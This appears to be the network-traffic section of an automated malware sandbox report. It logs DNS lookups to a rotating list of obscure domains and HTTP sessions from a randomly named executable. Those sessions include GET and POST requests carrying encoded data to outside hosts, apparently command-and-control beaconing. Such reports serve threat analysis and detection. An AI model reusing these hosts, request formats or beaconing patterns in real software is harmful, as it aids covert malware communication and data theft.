                    Sep 22, 2024 17:42:07.218750954 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:07.803864002 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:07.804009914 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:07.804050922 CEST4976580192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.814587116 CEST4976580192.168.2.4162.241.226.190
                    Sep 22, 2024 17:42:07.819328070 CEST8049765162.241.226.190192.168.2.4
                    Sep 22, 2024 17:42:13.432712078 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:13.437668085 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:13.438081980 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:13.451229095 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:13.456074953 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:14.194087029 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:14.195177078 CEST804976691.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:14.195271969 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:14.963695049 CEST4976680192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:15.981947899 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:15.986963987 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:15.987051964 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:15.999684095 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:16.004590034 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:16.718717098 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:16.718771935 CEST804976791.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:16.718947887 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:17.507911921 CEST4976780192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.525505066 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.530539989 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.530672073 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.544348001 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:18.551230907 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551263094 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551314116 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551343918 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551371098 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551418066 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551445961 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551474094 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:18.551501036 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:19.238317013 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:19.288645983 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:19.363653898 CEST804976891.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:19.363728046 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:20.057183027 CEST4976880192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.073820114 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.078857899 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.079135895 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.086118937 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.090980053 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791749001 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791809082 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791845083 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791878939 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791908979 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.791910887 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.791954041 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.792001009 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792033911 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792040110 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.792066097 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792098999 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792108059 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.792131901 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.792179108 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.799048901 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.799119949 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.799156904 CEST804976991.215.85.23192.168.2.4
                    Sep 22, 2024 17:42:21.799164057 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.799240112 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.802139044 CEST4976980192.168.2.491.215.85.23
                    Sep 22, 2024 17:42:21.807080984 CEST804976991.215.85.23192.168.2.4

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 22, 2024 17:39:45.755412102 CEST5437053192.168.2.41.1.1.1
                    Sep 22, 2024 17:39:45.766796112 CEST53543701.1.1.1192.168.2.4
                    Sep 22, 2024 17:39:50.774844885 CEST5511453192.168.2.41.1.1.1
                    Sep 22, 2024 17:39:50.786655903 CEST53551141.1.1.1192.168.2.4
                    Sep 22, 2024 17:39:55.807224989 CEST6042853192.168.2.41.1.1.1
                    Sep 22, 2024 17:39:56.250032902 CEST53604281.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:12.666068077 CEST6530253192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:12.676693916 CEST53653021.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:20.743695021 CEST4991953192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:20.924664021 CEST53499191.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:34.369201899 CEST5399553192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:34.488867044 CEST53539951.1.1.1192.168.2.4
                    Sep 22, 2024 17:40:47.838017941 CEST6199253192.168.2.41.1.1.1
                    Sep 22, 2024 17:40:48.542540073 CEST53619921.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:02.214943886 CEST5784253192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:02.977054119 CEST53578421.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:16.900048018 CEST5644453192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:16.925827980 CEST53564441.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:24.997777939 CEST6142853192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:25.034785032 CEST53614281.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:38.183232069 CEST6465253192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:38.201168060 CEST53646521.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:46.261848927 CEST5176053192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:46.320097923 CEST53517601.1.1.1192.168.2.4
                    Sep 22, 2024 17:41:59.462465048 CEST5555853192.168.2.41.1.1.1
                    Sep 22, 2024 17:41:59.503550053 CEST53555581.1.1.1192.168.2.4
                    Sep 22, 2024 17:42:12.822113037 CEST6410453192.168.2.41.1.1.1
                    Sep 22, 2024 17:42:13.430124044 CEST53641041.1.1.1192.168.2.4
                    Sep 22, 2024 17:42:27.212754011 CEST5771353192.168.2.41.1.1.1
                    Sep 22, 2024 17:42:27.262769938 CEST53577131.1.1.1192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Sep 22, 2024 17:39:45.755412102 CEST192.168.2.41.1.1.10x3456Standard query (0)www.teksales.spaceA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:39:50.774844885 CEST192.168.2.41.1.1.10x5433Standard query (0)www.linkbasic.netA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:39:55.807224989 CEST192.168.2.41.1.1.10xef40Standard query (0)www.route4.orgA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:12.666068077 CEST192.168.2.41.1.1.10xcb09Standard query (0)www.meery.storeA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:20.743695021 CEST192.168.2.41.1.1.10x32dcStandard query (0)www.subitoadomicilio.shopA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:34.369201899 CEST192.168.2.41.1.1.10xfc38Standard query (0)www.syvra.xyzA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:47.838017941 CEST192.168.2.41.1.1.10x4ea4Standard query (0)www.hm62t.topA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:02.214943886 CEST192.168.2.41.1.1.10x429aStandard query (0)www.zhuoyueapp.topA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:16.900048018 CEST192.168.2.41.1.1.10x8d42Standard query (0)www.pelus-pijama-pro.shopA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:24.997777939 CEST192.168.2.41.1.1.10x4bf1Standard query (0)www.autonashville.comA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:38.183232069 CEST192.168.2.41.1.1.10x9c56Standard query (0)www.torkstallningar.shopA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:46.261848927 CEST192.168.2.41.1.1.10xcd98Standard query (0)www.dom-2.onlineA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:59.462465048 CEST192.168.2.41.1.1.10x6fd7Standard query (0)www.easyanalytics.siteA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:42:12.822113037 CEST192.168.2.41.1.1.10xef48Standard query (0)www.kalomor.topA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:42:27.212754011 CEST192.168.2.41.1.1.10x4ddfStandard query (0)www.loan-insurance.shopA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Sep 22, 2024 17:39:45.766796112 CEST1.1.1.1192.168.2.40x3456Name error (3)www.teksales.spacenonenoneA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:39:50.786655903 CEST1.1.1.1192.168.2.40x5433Name error (3)www.linkbasic.netnonenoneA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:39:56.250032902 CEST1.1.1.1192.168.2.40xef40No error (0)www.route4.org34.150.58.73A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:12.676693916 CEST1.1.1.1192.168.2.40xcb09Name error (3)www.meery.storenonenoneA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:20.924664021 CEST1.1.1.1192.168.2.40x32dcNo error (0)www.subitoadomicilio.shop195.24.68.25A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:34.488867044 CEST1.1.1.1192.168.2.40xfc38No error (0)www.syvra.xyz162.0.213.94A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:40:48.542540073 CEST1.1.1.1192.168.2.40x4ea4No error (0)www.hm62t.tophm62t.topCNAME (Canonical name)IN (0x0001)false
                    Sep 22, 2024 17:40:48.542540073 CEST1.1.1.1192.168.2.40x4ea4No error (0)hm62t.top154.23.184.240A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:02.977054119 CEST1.1.1.1192.168.2.40x429aNo error (0)www.zhuoyueapp.top47.104.180.139A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:16.925827980 CEST1.1.1.1192.168.2.40x8d42Name error (3)www.pelus-pijama-pro.shopnonenoneA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:25.034785032 CEST1.1.1.1192.168.2.40x4bf1No error (0)www.autonashville.comautonashville.comCNAME (Canonical name)IN (0x0001)false
                    Sep 22, 2024 17:41:25.034785032 CEST1.1.1.1192.168.2.40x4bf1No error (0)autonashville.com3.33.130.190A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:25.034785032 CEST1.1.1.1192.168.2.40x4bf1No error (0)autonashville.com15.197.148.33A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:38.201168060 CEST1.1.1.1192.168.2.40x9c56Name error (3)www.torkstallningar.shopnonenoneA (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:46.320097923 CEST1.1.1.1192.168.2.40xcd98No error (0)www.dom-2.online199.59.243.227A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:41:59.503550053 CEST1.1.1.1192.168.2.40x6fd7No error (0)www.easyanalytics.siteeasyanalytics.siteCNAME (Canonical name)IN (0x0001)false
                    Sep 22, 2024 17:41:59.503550053 CEST1.1.1.1192.168.2.40x6fd7No error (0)easyanalytics.site162.241.226.190A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:42:13.430124044 CEST1.1.1.1192.168.2.40xef48No error (0)www.kalomor.topkalomor.topCNAME (Canonical name)IN (0x0001)false
                    Sep 22, 2024 17:42:13.430124044 CEST1.1.1.1192.168.2.40xef48No error (0)kalomor.top91.215.85.23A (IP address)IN (0x0001)false
                    Sep 22, 2024 17:42:27.262769938 CEST1.1.1.1192.168.2.40x4ddfNo error (0)www.loan-insurance.shoploan-insurance.shopCNAME (Canonical name)IN (0x0001)false
                    Sep 22, 2024 17:42:27.262769938 CEST1.1.1.1192.168.2.40x4ddfNo error (0)loan-insurance.shop84.32.84.32A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • www.route4.org
                    • www.subitoadomicilio.shop
                    • www.syvra.xyz
                    • www.hm62t.top
                    • www.zhuoyueapp.top
                    • www.autonashville.com
                    • www.dom-2.online
                    • www.easyanalytics.site
                    • www.kalomor.top

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.44973634.150.58.73805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:39:56.272306919 CEST480OUTGET /65ev/?_vft=vxWlbDi8ipa49jzp&6X=dwwIBvsgoPduu1x03LiLu+lQGDFRz/zz5BoPsCvlGePibN32srUYcBSr/DN58z3DeItGY9KIy82Fautrr2SZe1nede/ReFPQiUe32Ik0HHEAi+oCxkmAYmk= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.route4.org
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:39:57.205507040 CEST1236INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:39:57 GMT
                    Content-Type: text/html
                    Content-Length: 58288
                    Connection: close
                    Vary: Accept-Encoding
                    ETag: "6691ebc2-e3b0"
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                    Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                    Sep 22, 2024 17:39:57.205532074 CEST224INData Raw: 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62
                    Data Ascii: dy><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtz
                    Sep 22, 2024 17:39:57.205547094 CEST1236INData Raw: 49 45 4e 54 4e 75 69 38 73 6f 77 41 41 43 41 41 53 55 52 42 56 48 69 63 37 4a 31 33 65 42 52 56 46 38 62 66 4d 7a 50 62 30 68 4e 4b 36 43 41 67 56 55 43 43 39 4a 4a 51 46 55 52 46 52 51 45 62 58 52 45 4e 5a 55 46 43 68 34 55 59 51 4a 48 79 41 59
                    Data Ascii: IENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEbXRENZUFCh4UYQJHyAYIgxYIgSrHQAskSOoTeq/QSQnrdMnO/PyZoCMnu7GYXC/t7njwhM2fuXLacueWc9xBjDB4eL41XdPIH2Atg9AojVAOQQsAuAL8COBffJ9ryN3fRQx6NV3SqzIAWYKw1EQWDsZsgigawK75PdPrf3b8nDfI4rMdH4xW
                    Sep 22, 2024 17:39:57.205560923 CEST1236INData Raw: 50 61 66 2f 6b 58 79 2f 70 56 70 46 67 34 66 4d 7a 36 77 46 48 75 47 46 58 50 49 69 6a 57 6e 72 35 38 62 4f 50 74 46 34 48 4a 61 62 32 48 52 75 58 6e 30 41 49 59 57 64 75 35 2b 54 59 62 67 78 65 4e 2b 78 37 64 76 54 54 53 6a 48 48 77 43 50 69 58
                    Data Ascii: Paf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr5fZ/dbWbVCzCMhrkwWpBKIw13fRA+BxWO6D0BaArrBTakEQPh0wUICvsACE+gpbvOa6znkowE0AZntGEmNVUnJzFwIbvWEVVUWYEYC2Lu2dhz/xOCz30bqoExxwfdb
                    Sep 22, 2024 17:39:57.205574036 CEST1236INData Raw: 37 36 48 78 69 6b 34 44 69 43 67 47 51 42 63 38 48 43 5a 69 65 62 6f 4d 74 78 59 61 61 67 31 35 69 6a 34 57 77 42 59 61 32 38 35 6d 51 43 63 44 54 73 4a 4f 65 41 4d 44 4b 31 6e 4a 33 31 73 46 38 61 48 58 75 52 42 44 35 6c 47 4b 64 54 45 65 68 2b
                    Data Ascii: 76Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkHg2jsPZmHjTPXBok+9wCwDbaWy7ImOkSF7HshljJTH4lfbRcJAk2+k8ROVtnvfgMB6H5Xps7v6
                    Sep 22, 2024 17:39:57.205589056 CEST512INData Raw: 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c 4b 74 59 6b 6c 34 61 37 4a 68 4f 77 53 43 41 2f 4d 4d 43 6c
                    Data Ascii: WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjwOy5UQMQC2UmBMZtGUC5V
                    Sep 22, 2024 17:39:57.206554890 CEST1236INData Raw: 68 79 57 68 6b 4b 72 52 48 70 7a 48 4b 59 65 31 2b 75 68 4d 6f 63 78 6e 52 64 5a 59 65 48 4a 68 4d 4d 46 6d 39 52 56 4b 46 69 57 57 43 5a 36 33 6d 62 34 44 78 71 77 34 63 66 57 4d 57 62 53 2b 7a 68 34 75 31 50 6b 49 48 4e 48 52 6c 32 74 4f 2b 42
                    Data Ascii: hyWhkKrRHpzHKYe1+uhMocxnRdZYeHJhMMFm9RVKFiWWCZ63mb4Dxqw4cfWMWbS+zh4u1PkIHNHRl2tO+Brdmk8FoGRtbAmLiv1Ogd0/mn4hkUYABiW2VsaarTwxeTr7LG4MGNtvw1QNtRDed/WODIGj07balBgrUzUoKBtygG9RiFBQjedJZOXJyUVVHbKJww6r5qI2vkEqre/Qps0GT44d/p7BqPckeOYhMTEbcrJxUeQwBjO
                    Sep 22, 2024 17:39:57.206614017 CEST224INData Raw: 79 4a 70 69 56 51 43 6f 66 4c 57 71 33 77 62 57 71 31 4b 78 37 36 4b 74 46 2f 64 65 54 54 77 4b 58 38 30 64 4a 45 6f 62 77 66 41 47 4e 48 2b 46 37 79 6a 42 34 54 57 73 58 4b 74 35 30 37 6d 55 4f 2f 4e 4f 76 44 64 2f 31 37 32 73 74 44 47 42 47 74
                    Data Ascii: yJpiVQCofLWq3wbWq1Kx76KtF/deTTwKX80dJEobwfAGNH+F7yjB4TWsXKt507mUO/NOvDd/172stDGBGt3yz48bF044+FtUKa1PR564/AUpNQCaARgNYDuAGINRP9Ng1NsKgPxXwxizWU0l22zpuHvw2FxYxV1FGuWYLwV5qcoyhkKjpAk492rtCXPxetPxANkSDEwE8A6LMtrWbfoP0C9khglAXwBn
                    Sep 22, 2024 17:39:57.206624985 CEST1236INData Raw: 37 64 6b 6d 5a 35 73 2b 4d 31 36 66 55 51 31 58 6b 74 35 41 59 61 45 4f 50 4e 39 73 36 59 78 4e 4b 51 55 2b 79 33 2b 64 35 72 67 44 69 30 39 63 79 49 42 4f 33 63 58 4f 72 65 77 6c 52 2f 39 72 4d 52 6a 31 6a 51 31 47 2f 53 54 49 4d 36 6b 59 41 4a
                    Data Ascii: 7dkmZ5s+M16fUQ1Xkt5AYaEOPN9s6YxNKQU+y3+d5rgDi09cyIBO3cXOrewlR/9rMRj1jQ1G/STIM6kYAJ9CDmz+c32W57i7Zf10PZYu3dqvbOSPo1DSdyNU3O+4J84Ej1XgsIMt2OWQEq7DDuvdBsMuikzaFnvr2M4bH++ck2nJnafhhTfqBJU7OfN4TOmEnPS2PoImih7dHeEgy6GMALDRYNQfNBj1Iw1GfTVH+/BPhohslTC
                    Sep 22, 2024 17:39:57.207211971 CEST1236INData Raw: 6f 4f 38 64 42 51 76 74 6b 53 77 71 39 6a 38 31 48 58 47 45 66 69 47 52 6d 51 78 73 74 42 4c 62 54 4a 4e 35 47 56 73 52 4b 53 49 39 2b 36 4f 48 54 67 68 63 59 79 41 73 6c 65 65 35 69 77 38 4f 45 51 43 4e 49 4f 77 68 43 68 58 42 38 2f 5a 32 5a 6b
                    Data Ascii: oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee5iw8OEQCNIOwhChXB8/Z2ZkUA1xzt+9+NwagvZ4gdPgry4vkiAG1RhKrrAwSeO9uobGCofu2ByS1nbpiGQO+1IHqwpGGFF72Eq5Y6ELAw79hitijOqUwLpx1Wr3rh+wFsIwD3slO/OvjZT02OJFzujHyBciqOf7FWpVrn556I7VSW48N0vDocyrY
                    Sep 22, 2024 17:39:57.211489916 CEST1236INData Raw: 6b 6e 2f 4a 64 39 69 4d 35 49 7a 72 31 31 4d 7a 38 36 2f 64 57 52 70 57 4c 50 45 78 68 54 64 2f 47 51 4c 66 7a 55 61 54 4a 73 68 56 5a 44 77 38 7a 46 77 55 49 6a 64 64 43 4d 4b 65 4b 77 6d 72 32 4c 4c 5a 78 35 47 56 4b 36 39 2f 71 66 6a 6e 50 74
                    Data Ascii: kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZU/LvwrBNrzUY9R8C2A/CFCgYUQF5Uyai3W83rNZw6JIta5cdvrgMJf1Xgwqp/kT4hUXGjkRV7XIQmuc78x37amexRp3FlpdhwAbkmwJZJbHVurOLvj3ePzbCKoprCruGJ65


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.449738195.24.68.25805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:20.944772959 CEST763OUTPOST /x7sd/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.subitoadomicilio.shop
                    Origin: http://www.subitoadomicilio.shop
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.subitoadomicilio.shop/x7sd/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 7a 4b 2f 43 59 75 6c 4b 33 65 6c 4d 5a 67 2f 58 44 74 6d 4a 4b 63 36 36 66 44 66 53 69 69 42 72 65 66 4e 54 67 49 35 49 62 62 61 4b 62 69 51 66 76 5a 53 69 6a 36 6b 41 36 46 59 33 42 6b 30 57 34 54 76 32 6c 4f 6b 38 6d 64 44 42 30 4c 54 7a 32 65 4f 68 2f 48 6a 4b 4e 69 56 36 32 6c 52 47 44 72 6f 66 43 45 2f 65 4e 50 59 68 46 59 66 47 66 6b 43 43 43 47 50 46 37 4c 45 6b 35 6f 43 48 33 43 4e 79 37 36 5a 70 4f 64 34 4f 55 2f 39 39 73 4a 45 35 46 79 74 31 44 62 6d 7a 73 6f 45 79 6c 4a 73 56 76 58 50 4d 6c 53 48 73 37 64 64 32 61 59 31 35 70 48 54 31 58 67 58 68 72 2b 45 56 77 3d 3d
                    Data Ascii: 6X=8zK/CYulK3elMZg/XDtmJKc66fDfSiiBrefNTgI5IbbaKbiQfvZSij6kA6FY3Bk0W4Tv2lOk8mdDB0LTz2eOh/HjKNiV62lRGDrofCE/eNPYhFYfGfkCCCGPF7LEk5oCH3CNy76ZpOd4OU/99sJE5Fyt1DbmzsoEylJsVvXPMlSHs7dd2aY15pHT1XgXhr+EVw==
                    Sep 22, 2024 17:40:21.658854008 CEST591INHTTP/1.1 404 Not Found
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:40:21 GMT
                    Content-Type: text/html; charset=iso-8859-1
                    Content-Length: 424
                    Connection: close
